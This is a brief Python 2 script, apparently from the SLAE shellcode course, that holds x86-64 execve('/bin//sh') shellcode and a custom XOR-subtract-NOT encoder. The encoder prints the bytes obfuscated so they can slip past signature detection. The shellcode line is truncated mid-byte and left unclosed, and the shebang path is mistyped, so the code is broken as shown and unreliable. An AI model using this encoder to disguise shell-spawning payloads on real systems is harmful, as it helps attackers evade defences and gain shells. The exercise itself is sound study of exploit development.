#!/urs/bin/python
# -*- coding: utf-8 -*-
#encoder not_xor SLAE-1379
shellcode=bytearray("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x8$

def encode(value):
     return ~((value^0xda)-4) & 0xff


encoded=""
encoded2=""

for byte in shellcode:
    encoded+= "\\x%02x" % encode(byte)
    encoded2+= "0x%02x," % encode(byte)

encoded2=encoded2[:-1]

print "Encoded shellcode: ",len(shellcode)," bytes","\n",encoded,"\n",encoded2
